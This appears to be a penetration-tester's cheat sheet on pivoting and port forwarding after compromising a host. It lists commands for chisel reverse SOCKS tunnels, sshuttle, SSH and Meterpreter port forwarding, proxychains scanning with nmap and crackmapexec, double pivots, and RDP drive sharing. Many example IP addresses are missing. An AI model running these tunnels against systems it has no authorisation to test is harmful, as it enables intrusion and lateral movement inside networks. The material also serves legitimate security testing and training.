Pivoting and Portforwarding



# Clone Repository
git clone 'https://github.com/jpillora/chisel.git'

# Build Binary
go build

# Binary is now built and ready to be transfered over to target system.

Reverse SOCKS proxy

# Attacking Machine
./chisel server -p <Port> --reverse &
./chisel server -p 1337 --reverse &

# On Target Machine
./chisel client <Attacking-IP>:<Port> R:socks &
./chisel client R:socks &

# Then use Proxychains to scan internal networks from the compromised host.


# Authenticate with password
sshuttle -r <User>@<Target-IP> <Target-Subnet> -x <Target-IP>
sshuttle -r user@ -x

# Authenticate with key.
sshuttle -r <User>@<IP> --ssh-cmd "<Command>" <Target Subnet> -x <Exclude IP>
sshuttle -r root@ --ssh-cmd "ssh -i id_rsa" -x


# Forward RDP from internal host to Attacking Machine on port 1337.
ssh -L <LocalHost>:<Port>:<IP-To-Forward-From>:<Port> <User>@<IP>
ssh -L root@ -i id_rsa

# Forward remote port 80 to local port 80.
ssh atena@ -L 80:
ssh <User>@<IP> -L <Local-Port><Remote-Port>

# Dynamic SSH Port Forwarding
ssh -i <id_rsa> <User>@<IP> -D <Proxychains-Port>
ssh -i id_rsa errorcauser@ -D 1080

Metasploit with Proxychains

Change last line in /etc/proxychains4.conf to the following value: socks5 1080

Then use the following Metasploit module:

use auxiliary/server/socks_proxy

Set module options to the following (Default):

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)

We can then force applications to use proxychains by initiating commands with the command proxychains first.

proxychains nmap <IP> -sT -p 1-10000 -sV -v
proxychains crackmapexec smb -u '' -p ''
proxychains ssh <user>@<IP>
proxychains telnet <IP>

Double Pivot

# /etc/proxychains.conf
# Ensure dynamic_chain is uncommented

tcp_read_time_out 15000
tcp_connect_time_out 8000
socks5 1080  # First Pivot
socks5 1081  # Second Pivot

Port Forward

Meterpreter can be used to portforward for access to file shares and web servers.

portfwd add -l <LocalPort> -p <RemotePort> -r <TargetIP>
portfwd add -l 3333 -p 3389 -r

Essentially as per the example command above we could connect to RDP on our local port in order to hit the remote port.



Whilst not a direct pivoting technique, using xFreeRDP to share the hosts file system can give the attacker an easy route for moving files across systems to further assist with pivoting

xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share


Chisel: https://github.com/jpillora/chisel/releases/tag/v1.7.6


Last updated